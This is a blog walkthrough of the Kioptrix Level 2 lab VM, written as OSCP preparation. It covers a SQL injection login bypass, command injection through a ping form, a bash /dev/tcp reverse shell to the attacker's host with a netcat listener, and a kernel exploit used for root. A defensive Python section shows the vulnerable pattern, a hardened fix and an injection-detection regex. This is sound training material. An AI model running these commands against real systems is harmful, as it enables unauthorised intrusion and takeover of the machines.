Kioptrix Level 1.1 (Kioptrix Level 2) Walkthrough: My Path To OSCP

RANAJEET
Oct 14, 2020

This is the second blog post about my OSCP preparation, working through the TJnull VulnHub VM list. You can check out the full VM list here.

Let’s Begin:

First import the VM into your favorite virtualization software and get its IP address. You can get the VM here. If you have trouble getting the IP address, assign a new network adapter to the Kioptrix VM and then remove the first network adapter. If you need the command for finding the VM’s IP address, check my first blog post here.

Now that we have the IP and the VM is up and running, let’s start with reconnaissance.

Reconnaissance

Let’s start with an nmap scan, done @ippsec style.

sudo nmap -sC -sV -oA nmap/kioptrix2 192.168.28.130

  • -sC : run the default scripts
  • -sV : version detection
  • -oA : output in all formats to the path nmap/kioptrix2

We got a bunch of open ports:

  • 22/tcp (SSH)
  • 80/tcp (HTTP)
  • 443/tcp (HTTPS)
  • 3306/tcp (MySQL)

Now that we have some information, let’s move on to enumeration.

Enumeration

Let’s start with SSH. I searched for any exploit available for the version, OpenSSH 3.9p1, and found an Exploit-DB entry which you can see here, but it was not much help. For the Apache version I also found no useful exploit.

Now it’s time to enumerate the web page. First let’s run quick nikto and gobuster directory scans.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.28.130 -t 10 -x php,txt,html

  • dir : directory brute-force mode
  • -w : wordlist path
  • -u : target URL
  • -t : thread count
  • -x : extensions to append to each word

Nothing much of interest came out of the scans.

Now let’s browse the web page.

We get a simple login page. Try a simple login of admin / admin and intercept the traffic with Burp.

It shows no error for the request, but we found a comment saying that the attempt could be logged by the administrator. Now let’s check whether we can perform SQL injection. For the username we use admin’# and for the password some random string: in MySQL, # starts a comment, so everything after it in the query, including the password check, is ignored.

It worked, and we are redirected to another page. I did this manually, but you could use sqlmap for the task.

The new page has a ping feature; let’s test it with google.com in the box.

It performs the ping. Now let’s check whether a second command can be appended to the ping command, testing whether bash is available with the whereis command.

It worked: we got the localhost ping plus the output of whereis bash. In the next step we can run a reverse shell command and get a shell. I’m using a bash reverse shell here, but you can choose any reverse shell; before doing anything, check that the required binary is available on the victim machine.

Let’s do a reverse shell with bash. You can check the pentestmonkey reverse shell cheat sheet here.

Just change the IP and port number in the reverse shell command and start the netcat listener on our Kali machine.

  • bash reverse shell: bash -i >& /dev/tcp/192.168.28.128/4444 0>&1
  • netcat listener: nc -nlvp 4444

We now have a reverse shell as the apache user. The next step is privilege escalation to root.
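To see why the ping box above was injectable and what the fix looks like from the defender’s side, here is an added example (my own code, not part of the Kioptrix application): the string-concatenation pattern that lets a second command ride along, next to a hardened version that allowlists the target and passes argv without a shell. The function and variable names are assumptions for the demo, and the sample inputs are constructed from the walkthrough.

```python
import ipaddress
import re
from typing import List

# Constructed inputs: the legitimate test value used above, and the
# "append a second command" pattern the walkthrough describes.
LEGIT_TARGET = "google.com"
INJECTED_TARGET = "google.com; whereis bash"

# RFC 1123-style hostname: dot-separated labels of letters, digits and
# hyphens, no label starting or ending with a hyphen, 253 chars max.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def vulnerable_command(target: str) -> str:
    """The weak pattern: user input pasted into a shell command string.
    Returned rather than executed so the reader can see exactly what the
    shell would parse; ';' ends the ping and starts a new command."""
    return "ping -c 3 " + target


def is_valid_target(target: str) -> bool:
    """Allowlist check: an IP address literal or a hostname, nothing else.
    Shell metacharacters, spaces and a leading '-' all fail this test."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME_RE.match(target))


def safe_argv(target: str) -> List[str]:
    """Hardened form: validate first, then build an argv list to hand to
    subprocess.run(..., shell=False). No shell ever sees the input, so a
    metacharacter could at most be a (rejected) literal hostname."""
    if not is_valid_target(target):
        raise ValueError(f"rejected ping target: {target!r}")
    return ["ping", "-c", "3", target]


def looks_like_injection(value: str) -> bool:
    """Log-review heuristic for the ping parameter: any shell separator,
    substitution or redirection character is a red flag worth alerting on."""
    return re.search(r"[;&|`$(){}<>\n]", value) is not None
```

The same allowlist check applied at the web tier would also have blocked the reverse shell step, since /dev/tcp and the redirections in that command are not a hostname.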

Privilege Escalation

Let’s check its OS and kernel version.

It is running CentOS 4.5 (Final) with kernel 2.6.9 on x86. Let’s do a quick searchsploit before googling it.

Now copy the exploit to our machine and send it to the Kioptrix VM. We will use a simple Python web server for this task.

python3 -m http.server 9000

We got permission denied in the main path, but it worked in /tmp. Now it’s time to compile the exploit and run it.

And here we got a root shell. You can compile the code on your own machine and send the binary to the victim machine, but check for compatibility errors first: this exploit was written for x86 while my Kali machine is x64, so I had to pass the -m32 flag to gcc. Also check for missing libraries.

gcc -m32 -o privesc 9542.c

For the missing header (#include <bits/libc-header-start.h>) you have to install gcc-multilib, which fixes the issue.

sudo apt-get install gcc-multilib

Key Learnings From This Box:

  • Before brute-forcing a login, check for SQL injection.
  • If wget reports a save error, try /tmp or another writable directory.
  • Always check exploit compatibility before running it.
